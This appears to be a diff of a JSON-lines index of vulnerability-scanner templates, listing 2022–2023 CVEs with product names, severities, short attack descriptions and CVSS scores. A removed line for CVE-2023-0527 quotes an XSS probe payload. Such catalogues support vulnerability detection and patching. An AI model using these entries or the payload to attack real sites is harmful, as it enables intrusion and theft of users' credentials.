vulnerability in the Add New Field function at /index.php?module=entities/fields\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44949.yaml"} +{"ID":"CVE-2022-44950","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44950.yaml"} +{"ID":"CVE-2022-44951","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44951.yaml"} +{"ID":"CVE-2022-44952","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44952.yaml"} +{"ID":"CVE-2022-44957","Info":{"Name":"WebTareas 2.4p5 - Cross-Site Scripting","Severity":"medium","Description":"webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44957.yaml"} {"ID":"CVE-2022-45037","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45037.yaml"} {"ID":"CVE-2022-45038","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45038.yaml"} +{"ID":"CVE-2022-45354","Info":{"Name":"Download Monitor \u003c= 4.7.60 - Sensitive Information Exposure","Severity":"medium","Description":"The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-45354.yaml"} {"ID":"CVE-2022-45362","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.0 - Server-Side Request Forgery","Severity":"high","Description":"WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-45362.yaml"} +{"ID":"CVE-2022-45365","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site-Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45365.yaml"} {"ID":"CVE-2022-45805","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.3 - SQL Injection","Severity":"critical","Description":"WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45805.yaml"} {"ID":"CVE-2022-45835","Info":{"Name":"WordPress PhonePe Payment Solutions \u003c=1.0.15 - Server-Side Request Forgery","Severity":"medium","Description":"WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-45835.yaml"} {"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning \u003c7.16 - Open Redirect","Severity":"medium","Description":"ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45917.yaml"} {"ID":"CVE-2022-45933","Info":{"Name":"KubeView \u003c=0.1.31 - Information Disclosure","Severity":"critical","Description":"KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45933.yaml"} {"ID":"CVE-2022-46020","Info":{"Name":"WBCE CMS v1.5.4 - Remote Code Execution","Severity":"critical","Description":"WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46020.yaml"} +{"ID":"CVE-2022-46071","Info":{"Name":"Helmet Store Showroom v1.0 - SQL Injection","Severity":"critical","Description":"There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46071.yaml"} +{"ID":"CVE-2022-46073","Info":{"Name":"Helmet Store Showroom - Cross Site Scripting","Severity":"medium","Description":"Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46073.yaml"} {"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c=1.2.22 - Remote Command Injection","Severity":"critical","Description":"Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46169.yaml"} {"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46381.yaml"} +{"ID":"CVE-2022-46443","Info":{"Name":"Bangresto - SQL Injection","Severity":"high","Description":"Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-46443.yaml"} +{"ID":"CVE-2022-46463","Info":{"Name":"Harbor \u003c=2.5.3 - Unauthorized Access","Severity":"high","Description":"An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-46463.yaml"} {"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP \u003c1.7.33 - Cross-Site Scripting","Severity":"medium","Description":"NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46888.yaml"} {"ID":"CVE-2022-46934","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46934.yaml"} {"ID":"CVE-2022-47002","Info":{"Name":"Masa CMS - Authentication Bypass","Severity":"critical","Description":"Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47002.yaml"} {"ID":"CVE-2022-47003","Info":{"Name":"Mura CMS \u003c10.0.580 - Authentication Bypass","Severity":"critical","Description":"Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47003.yaml"} +{"ID":"CVE-2022-47075","Info":{"Name":"Smart Office Web 20.28 - Information Disclosure","Severity":"high","Description":"An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-47075.yaml"} +{"ID":"CVE-2022-47615","Info":{"Name":"LearnPress Plugin \u003c 4.2.0 - Local File Inclusion","Severity":"critical","Description":"Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin \u003c= 4.1.7.3.2 versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47615.yaml"} {"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47945.yaml"} {"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47966.yaml"} {"ID":"CVE-2022-47986","Info":{"Name":"IBM Aspera Faspex \u003c=4.4.2 PL1 - Remote Code Execution","Severity":"critical","Description":"IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47986.yaml"} {"ID":"CVE-2022-48012","Info":{"Name":"OpenCATS 0.9.7 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings\u0026a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48012.yaml"} {"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"} +{"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"} {"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"} -{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} +{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} {"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} -{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} +{"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"} +{"ID":"CVE-2023-0334","Info":{"Name":"ShortPixel Adaptive Images \u003c 3.6.3 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0334.yaml"} +{"ID":"CVE-2023-0448","Info":{"Name":"WP Helper Lite \u003c 4.3 - Cross-Site Scripting","Severity":"medium","Description":"The WP Helper Lite WordPress plugin, in versions \u003c 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0448.yaml"} +{"ID":"CVE-2023-0514","Info":{"Name":"Membership Database \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0514.yaml"} +{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} {"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"} {"ID":"CVE-2023-0563","Info":{"Name":"Bank Locker Management System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-0563.yaml"} +{"ID":"CVE-2023-0600","Info":{"Name":"WP Visitor Statistics (Real Time Traffic) \u003c 6.9 - SQL Injection","Severity":"critical","Description":"The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0600.yaml"} +{"ID":"CVE-2023-0602","Info":{"Name":"Twittee Text Tweet \u003c= 1.0.8 - Cross-Site Scripting","Severity":"medium","Description":"The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0602.yaml"} {"ID":"CVE-2023-0630","Info":{"Name":"Slimstat Analytics \u003c 4.9.3.3 Subscriber - SQL Injection","Severity":"high","Description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0630.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"Fortra GoAnywhere MFT - Remote Code Execution","Severity":"high","Description":"Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0669.yaml"} +{"ID":"CVE-2023-0777","Info":{"Name":"modoboa 2.0.4 - Admin TakeOver","Severity":"critical","Description":"Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0777.yaml"} +{"ID":"CVE-2023-0900","Info":{"Name":"AP Pricing Tables Lite \u003c= 1.1.6 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-0900.yaml"} {"ID":"CVE-2023-0942","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"} +{"ID":"CVE-2023-0947","Info":{"Name":"Flatpress \u003c 1.3 - Path Traversal","Severity":"critical","Description":"Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0947.yaml"} {"ID":"CVE-2023-0948","Info":{"Name":"WordPress Japanized for WooCommerce \u003c2.5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0948.yaml"} {"ID":"CVE-2023-0968","Info":{"Name":"WordPress Watu Quiz \u003c3.3.9.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0968.yaml"} {"ID":"CVE-2023-1020","Info":{"Name":"Steveas WP Live Chat Shoutbox \u003c= 1.4.2 - SQL Injection","Severity":"critical","Description":"The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1020.yaml"} {"ID":"CVE-2023-1080","Info":{"Name":"WordPress GN Publisher \u003c1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1080.yaml"} {"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"} +{"ID":"CVE-2023-1263","Info":{"Name":"Coming Soon \u0026 Maintenance \u003c 4.1.7 - Unauthenticated Post/Page Access","Severity":"medium","Description":"The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-1263.yaml"} {"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"} +{"ID":"CVE-2023-1408","Info":{"Name":"Video List Manager \u003c= 1.7 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-1408.yaml"} {"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} {"ID":"CVE-2023-1454","Info":{"Name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1454.yaml"} {"ID":"CVE-2023-1496","Info":{"Name":"Imgproxy \u003c 3.14.0 - Cross-site Scripting (XSS)","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1496.yaml"} +{"ID":"CVE-2023-1546","Info":{"Name":"MyCryptoCheckout \u003c 2.124 - Cross-Site Scripting","Severity":"medium","Description":"The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1546.yaml"} {"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"} -{"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} +{"ID":"CVE-2023-1698","Info":{"Name":"WAGO - Remote Command Execution","Severity":"critical","Description":"In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1698.yaml"} +{"ID":"CVE-2023-1730","Info":{"Name":"SupportCandy \u003c 3.1.5 - Unauthenticated SQL Injection","Severity":"critical","Description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1730.yaml"} +{"ID":"CVE-2023-1780","Info":{"Name":"Companion Sitemap Generator \u003c 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1780.yaml"} 